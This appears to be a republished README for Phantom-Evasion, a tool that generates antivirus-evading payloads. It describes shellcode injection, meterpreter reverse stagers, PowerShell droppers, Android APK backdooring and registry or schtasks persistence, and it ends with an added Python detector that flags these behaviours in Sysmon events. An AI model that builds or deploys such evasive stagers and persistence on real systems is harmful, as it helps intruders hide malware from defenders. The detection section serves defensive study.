Simply git clone or download and unzip the Phantom-Evasion folder.

Kali Linux: automatic setup is officially supported; open a terminal and execute phantom-evasion:

    sudo python phantom-evasion.py

or:

    sudo chmod +x ./phantom-evasion.py
    sudo ./phantom-evasion.py

Dependencies (only for manual setup)

- metasploit-framework
- mingw-w64 (cygwin on windows)
- gcc
- apktool
- strip
- wine (not necessary on windows)
- apksigner
- pyinstaller
- require libc6-dev-i386 (linux only)

WINDOWS PAYLOADS

Windows Shellcode Injection Modules (C)

Msfvenom windows payloads and custom shellcodes supported.
(>) Randomized junkcode and windows antivirus evasion techniques
(>) Multibyte Xor encoders available (see Multibyte Xor encoders readme section)
(>) Decoy Processes Spawner available (see Decoy Process Spawner section)
(>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix))
(>) Execution time range: 35-60 seconds

- Windows Shellcode Injection VirtualAlloc: Inject and execute shellcode in memory using the VirtualAlloc, CreateThread, WaitForSingleObject API.
- Windows Shellcode Injection VirtualAlloc NoDirectCall LL/GPA: Inject and execute shellcode in memory using the VirtualAlloc, CreateThread, WaitForSingleObject API. Critical APIs are dynamically loaded (no direct call) using the LoadLibrary and GetProcAddress API.
- Windows Shellcode Injection VirtualAlloc NoDirectCall GPA/GMH: Inject and execute shellcode in memory using the VirtualAlloc, CreateThread, WaitForSingleObject API. Critical APIs are dynamically loaded (no direct call) using the GetModuleHandle and GetProcAddress API.
- Windows Shellcode Injection HeapAlloc: Inject and execute shellcode in memory using the HeapAlloc, HeapCreate, CreateThread, WaitForSingleObject API.
- Windows Shellcode Injection HeapAlloc NoDirectCall LL/GPA: Inject and execute shellcode in memory using the HeapCreate, HeapAlloc, CreateThread, WaitForSingleObject API. Critical APIs are dynamically loaded (no direct call) using the LoadLibrary and GetProcAddress API.
- Windows Shellcode Injection HeapAlloc NoDirectCall GPA/GMH: Inject and execute shellcode in memory using the HeapCreate, HeapAlloc, CreateThread, WaitForSingleObject API. Critical APIs are dynamically loaded (no direct call) using the GetModuleHandle and GetProcAddress API.
- Windows Shellcode Injection Process inject: Inject and execute shellcode into remote process memory (default: OneDrive.exe (x86), explorer.exe (x64)) using the VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, WaitForSingleObject API.
- Windows Shellcode Injection Process inject NoDirectCall LL/GPA: Inject and execute shellcode into remote process memory (default: OneDrive.exe (x86), explorer.exe (x64)) using the VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, WaitForSingleObject API. Critical APIs are dynamically loaded (no direct call) using the LoadLibrary and GetProcAddress API.
- Windows Shellcode Injection Process inject NoDirectCall GPA/GMH: Inject and execute shellcode into remote process memory (default: OneDrive.exe (x86), explorer.exe (x64)) using the VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, WaitForSingleObject API. Critical APIs are dynamically loaded (no direct call) using the GetModuleHandle and GetProcAddress API.
- Windows Shellcode Injection Thread Hijack: Inject shellcode into remote process memory and execute it by performing a thread execution hijack (default: OneDrive.exe (x86), explorer.exe (x64)) using the VirtualAllocEx, WriteProcessMemory, Get/SetThreadContext, Suspend/ResumeThread API.
- Windows Shellcode Injection Thread Hijack LL/GPA: Inject shellcode into remote process memory and execute it by performing a thread execution hijack (default: OneDrive.exe (x86), explorer.exe (x64)) using the VirtualAllocEx, WriteProcessMemory, Get/SetThreadContext, Suspend/ResumeThread API. Critical APIs are dynamically loaded (no direct call) using the LoadLibrary and GetProcAddress API.
- Windows Shellcode Injection Thread Hijack GPA/GMH: Inject shellcode into remote process memory and execute it by performing a thread execution hijack (default: OneDrive.exe (x86), explorer.exe (x64)) using the VirtualAllocEx, WriteProcessMemory, Get/SetThreadContext, Suspend/ResumeThread API. Critical APIs are dynamically loaded (no direct call) using the GetModuleHandle and GetProcAddress API.

Windows Pure C meterpreter stager

Pure C polymorphic meterpreter stagers compatible with msfconsole and Cobalt Strike beacon (reverse_tcp/reverse_http).
(>) Randomized junkcode and windows antivirus evasion techniques
(>) Phantom evasion decoy process spawner available (see phantom evasion decoy process spawner section)
(>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix))
(>) Execution time range: 35-60 seconds

- C meterpreter/reverse_TCP VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in C (requires a multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) or windows/x64/meterpreter/reverse_tcp (if x64); memory: Virtual)
- C meterpreter/reverse_TCP HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in C (requires a multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) or windows/x64/meterpreter/reverse_tcp (if x64); memory: Heap)
- C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in C (requires a multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) or windows/x64/meterpreter/reverse_tcp (if x64); memory: Virtual; API loaded at runtime)
- C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in C (requires a multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) or windows/x64/meterpreter/reverse_tcp (if x64); memory: Heap; API loaded at runtime)
- C meterpreter/reverse_HTTP VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in C (requires a multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) or windows/x64/meterpreter/reverse_http (if x64); memory: Virtual)
- C meterpreter/reverse_HTTP HeapAlloc (x86/x64): 32/64 bit
windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , memory:Heap) C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , API loaded at runtime) C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , memory:Heap , API loaded at runtime) C meterpreter/reverse_HTTPS VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , memory:Virtual) C meterpreter/reverse_HTTPS HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , memory:Heap) C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , API loaded at runtime) C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — 
windows/x64/meterpreter/reverse_https (if x64) , memory:Heap , API loaded at runtime) Powershell / Wine-Pyinstaller modulesPowershell modules:(>) Randomized junkcode and windows antivirus evasion techniques (>) Decoy Process Spawner available (see phantom evasion decoy process spawner section) (>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix)) (>) Execution time range:35-60 secondWindows Powershell/Cmd Oneliner Dropper: Require user-supplied Powershell/Cmd oneliner payload (example Empire oneliner payload). Generate Windows powershell/Cmd oneliner dropper written in c. Powershell/Cmd oneliner payload is executed using system() function. Windows Powershell Script Dropper: Both msfvenom and custom powershell payloads supported. (32 bit powershell payloads are not compatible with 64 bit powershell target and vice versa.) Generate Windows powershell script (.ps1) dropper written in c. Powershell script payload is executed using system() function (powershell -executionpolicy bypass -WindowStyle Hidden -Noexit -File “PathTops1script"). Wine-Pyinstaller modules:(>) Randomized junkcode and windows antivirus evasion techniques (>) Execution time range:5-25 second (>) Require python and pyinstaller installed in wine.Windows WinePyinstaller Python MeterpreterPure python meterpreter payload.WinePyinstaller Oneline payload dropperPure python powershell/cmd oneliner dropper.Powershell/cmd payload executed using os.system().LINUX PAYLOADSLinux Shellcode Injection Module (C)Msfvenom linux payloads and custom shellcodes supported.(>) Randomized junkcode and C antivirus evasion techniques (>) Multibyte Xor encoders availables (see Multibyte Xor encoders readme section) (>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix)) (>) Execution time range:20-45 secondLinux Shellcode Injection HeapAlloc: Inject and Execute shellcode in memory using mmap and memcpy. 
Linux Bash Oneliner Dropper: Execute custom oneliner payload using system() function. OSX PAYLOADSOSX 32bit multi-encoded:Pure msfvenom multi-encoded OSX payloads.ANDROID PAYLOADSAndroid Msfvenom Apk smali/baksmali:(>) Fake loop injection (>) Goto loopAndroid msfvenom payloads modified an rebuilded with apktool (Also capable of apk backdoor injection).UNIVERSAL PAYLOADSGenerate executable compatible with the OSs used to run Phantom-Evasion.Universal Meterpreter increments-trick Universal Polymorphic Meterpreter Universal Polymorphic Oneliner dropper POST-EXPLOITATION MODULESWindows Persistence RegCreateKeyExW Add Registry Key (C) This modules generate executables which needs to be uploaded to the target machine and excuted specifing the fullpath to file to add to startup as arguments. Windows Persistence REG Add Registry Key (CMD) This module generate persistence cmdline payloads (Add Registry Key via REG.exe). Windows Persistence Keep Process Alive This module generate executable which need to be uploaded to the target machine and executed. Use CreateToolSnapshoot ProcessFirst and ProcessNext to check if specified process is alive every X seconds. Usefull combined with Persistence N.1 or N.2 (persistence start Keep process alive file which then start and keep alive the specified process) Windows Persistence Schtasks cmdline This modules generate persistence cmdline payloads (using Schtasks.exe).Windows Set Files Attribute Hiddenhide file through commandline or with compiled executable (SetFileAttributes API)WarningPYTHON3 COMPATIBILITY TEMPORARILY SUSPENDED!Decoy Processes Spawner:During target-side execution this will cause to spawn (Using WinExec or CreateProcess API) a maximum of 4 processes consequentialy. The last spawned process will reach the malicious section of code while the other decoy processes spawned before will executes only random junk code.PRO: Longer execution time,Lower rate of detection. 
CONS: Higher resource consumption.Multibyte Xor Encoder:C xor encoders with three pure c decoding stub available with Shellcode Injection modules.MultibyteKey xor:Shellcode xored with one multibyte (variable lenght) random key. Polymorphic C decoder stub.Double Multibyte-key xor:Shellcode xored with the result of xor between two multibyte (variable lenght) random keys Polymorphic C decoder stub.Triple Multibyte-key xor:Shellcode xored with the result of xor between two multibyte (variable lenght) random keys xored with a third multibyte random key. Polymorphic C decoder stub.Download Phantom-Evasion
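From the defender's side, the module list above names concrete observable behaviours: CreateRemoteThread into explorer.exe or OneDrive.exe, a Run-key value written by RegCreateKeyExW or REG.exe, and a schtasks.exe task creation. The following is an added example, not part of Phantom-Evasion, that flags those three patterns in Sysmon-style events (Event ID 8 CreateRemoteThread, 13 RegistryEvent value set, 1 ProcessCreate); the event dicts and the file paths in them are constructed for illustration and simplified from real Sysmon output.

```python
"""Added example (not Phantom-Evasion code): flag, in Sysmon-style events,
the injection and persistence behaviours listed in the module descriptions."""
import re
from typing import Optional

# Default injection targets named by the Process inject / Thread Hijack modules.
INJECT_TARGETS = {"onedrive.exe", "explorer.exe"}
# Autostart key written by the RegCreateKeyExW and REG.exe persistence modules.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Task creation as used by the Schtasks cmdline persistence module.
SCHTASKS = re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.IGNORECASE)


def classify(ev: dict) -> Optional[str]:
    """Return a finding label for one event, or None if nothing matched."""
    eid = ev.get("EventID")
    if eid == 8:  # Sysmon CreateRemoteThread: who injected into what
        target = ev.get("TargetImage", "").rsplit("\\", 1)[-1].lower()
        if target in INJECT_TARGETS:
            return f"remote-thread-into-{target}"
    elif eid == 13:  # Sysmon RegistryEvent (value set)
        if RUN_KEY.search(ev.get("TargetObject", "")):
            return "run-key-persistence"
    elif eid == 1:  # Sysmon ProcessCreate
        if SCHTASKS.search(ev.get("CommandLine", "")):
            return "schtasks-persistence"
    return None


def scan(events):
    """Return (EventID, label) for every event that matched a pattern."""
    return [(ev["EventID"], label) for ev in events if (label := classify(ev))]


SAMPLE_EVENTS = [  # constructed sample events, not real telemetry
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 8, "SourceImage": r"C:\Users\u\update.exe", "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\upd",
     "Details": r"C:\Users\u\update.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks.exe /create /sc onlogon /tn upd /tr "C:\\Users\\u\\update.exe"'},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Example\Setting", "Details": "1"},
]

if __name__ == "__main__":
    for eid, label in scan(SAMPLE_EVENTS):
        print(eid, label)
```

Remote threads into explorer.exe from an unsigned binary in a user profile, followed by a Run-key or scheduled-task write from the same image, is the chain worth correlating; either event alone also occurs in benign software.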

Link: http://feedproxy.google.com/~r/PentestTools/~3/u2lYO11vEuc/phantom-evasion-python-av-evasion-tool.html